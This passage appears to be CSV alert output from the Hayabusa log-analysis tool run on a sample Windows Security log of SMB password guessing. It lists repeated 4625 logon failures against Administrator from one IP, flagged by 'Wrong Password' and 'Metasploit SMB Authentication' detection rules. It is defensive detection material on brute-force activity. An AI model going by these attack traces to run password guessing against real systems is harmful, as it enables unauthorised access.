Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
